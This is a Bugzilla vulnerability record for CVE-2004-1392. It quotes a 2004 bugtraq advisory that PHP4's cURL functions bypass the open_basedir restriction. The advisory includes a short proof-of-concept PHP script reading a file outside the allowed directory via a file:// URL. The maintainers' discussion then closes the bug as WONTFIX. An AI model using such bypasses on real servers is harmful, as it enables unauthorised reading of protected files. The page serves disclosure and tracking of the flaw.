Bugzilla – Bug 62911
VUL-0: CVE-2004-1392: php4 open_basedir bypass
Last modified: 2021-10-13 10:18:47 UTC
We received the following report via bugtraq. The issue is public. I can't judge whether this really a problem. Is open_basedir meant to restrict php scripts to a specific directory or is it just the default current directory? Date: Wed, 27 Oct 2004 18:26:23 +0200 From: FraMe <frame@hispalab.com> To: bugtraq@securityfocus.com Subject: PHP4 cURL functions bypass open_basedir ==================================================== Subject: PHP4 cURL functions bypass open_basedir Author: frame at kernelpanik.org Product: PHP4 compile with cURL (not tested in PHP5) Vendor: PHP/Zend Vendor URL: www.php.net Tipe: Local Risk: Low/Medium ===================================================== PHP cURL functions bypass open_basedir protection, so users can navigate through filesystem. For example, setting "open_basedir" in php.ini to "/var/www/html" anybody can retrieve "/etc/parla" using cURL functions. == Proof of concept (curl.php) <?php $ch = curl_init("file:///etc/parla"); $file=curl_exec($ch); echo $file ?> == Demo $ cat /etc/parla don't read please! $ links -dump http://localhost/curltest/curl.php don't read please! == Release Timeline No release timeline.
hello?
open_basedir is meant to restrict access to a specific directory. The recommendation from php developpers: you need to configure/install curl not to allow access to the local filesystem. It has a nice configure option for that when you are installing it. IMHO this would be a nasty restrict for the curl library. Note that the open_basedir mechanism cannot restrict all access to open_basedir, like in passthru('cat /etc/parla').
So this open_basedir is a useless feature anyways. I'll close as WONTFIX.
CAN-2004-1392
CVE-2004-1392: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)